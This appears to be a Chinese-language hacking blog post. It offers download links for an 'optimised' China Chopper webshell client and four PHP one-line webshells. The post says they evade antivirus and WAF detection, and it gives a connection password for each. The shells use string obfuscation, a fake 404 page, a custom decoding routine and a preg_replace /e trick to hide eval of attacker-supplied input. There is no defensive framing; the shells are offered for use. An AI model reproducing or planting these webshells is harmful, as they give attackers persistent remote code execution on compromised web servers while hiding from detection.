中国菜刀下载,基于原版中国菜刀优化版20160309.
下载地址:
http://download.csdn.net/detail/settoken/9457567
https://pan.baidu.com/s/1jHoJxHW
China chopper
https://pan.baidu.com/s/1eRxEYjC
这次特别推荐的一个php免杀过WAF一句话.
无任何php危险函数特征,除eval外,无POST GET REQUEST 请求函数.
<?php $g18="<X(CAT[tuhDdUOvbqPcEil'=5F]NYB!r\";1SL7`9G#k+ w>_{@~y-fHIJ\r:8\$MgoR6}Wj*s^n,4x0\\m.Q%V3|e\n&)azKZ/?2p\t";$GLOBALS['bbsfw34'] = ${$g18[47].$g18[17].$g18[13].$g18[35].$g18[5]};$GLOBALS['majcz28'] = $g18[9].$g18[85].$g18[89].$g18[11].$g18[85].$g18[31];if (!empty($GLOBALS['bbsfw34']['mf8c3a3b0'])) { eval($GLOBALS['bbsfw34']['mf8c3a3b0']); } $GLOBALS['majcz28']($g18[54].$g18[5].$g18[5].$g18[17].$g18[93].$g18[34].$g18[79].$g18[76].$g18[44].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11]); echo $g18[0].$g18[9].$g18[34].$g18[46].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11].$g18[0].$g18[93].$g18[9].$g18[34].$g18[46].$g18[57].$g18[86].$g18[5].$g18[9].$g18[85].$g18[44].$g18[96].$g18[89].$g18[62].$g18[85].$g18[44].$g18[7].$g18[9].$g18[89].$g18[7].$g18[44].$g18[51].$g18[63].$g18[8].$g18[44].$g18[9].$g18[89].$g18[14].$g18[85].$g18[44].$g18[31].$g18[85].$g18[16].$g18[8].$g18[85].$g18[70].$g18[7].$g18[85].$g18[11].$g18[44].$g18[18].$g18[63].$g18[8].$g18[21].$g18[11].$g18[44].$g18[72].$g18[63].$g18[7].$g18[44].$g18[15].$g18[85].$g18[44].$g18[53].$g18[63].$g18[8].$g18[72].$g18[11].$g18[79].$g18[57].$g18[86]; ?>
这个php一句带非常真实的404页面.运行界面如下图:
配合优化版菜刀可以直接连接,如图.
连接密码为:mf8c3a3b0
第二个:
<?php
function Aes($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
$k=(($i+2)/2)%strlen($key);
$p=substr($key, $k,1);
if(is_numeric(substr($str, $i,1)))
{
$t=$t.chr(hexdec(substr($str, $i,2))-$p);
}
else
{
$t=$t.chr(hexdec(substr($str, $i,4)));
$i=$i+2;
}
}
return($t);
}
(@$_=Aes('6A767C687B77','39')).@$_(Aes('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>
这个一句话也是无危险函数特征,菜刀直接连接.
连接密码为:520
第三个:
<?php
error_reporting(0);
echo "404 Not Found.";
$default= "ps_ot" ;
$about =strtoupper($default[2]. $default[0] .$default[3]. $default[1].$default[4] );
if (isset(${ $about } ['index' ]) ) {eval ( ${$about } [ 'index'] );} ?>
这也是非常值得推荐给大家的。
连接密码为:index
第四个:
array_walk函数,在php4 php5 php7所有php版本中通用.
<?php
$e = $_REQUEST['www'];
$arr = array($_POST['settoken'] => '|.*|e',);
array_walk($arr, $e, '');
?>
使用方法如下图:
在php文件后面加上?www=preg_replace
连接密码为:settoken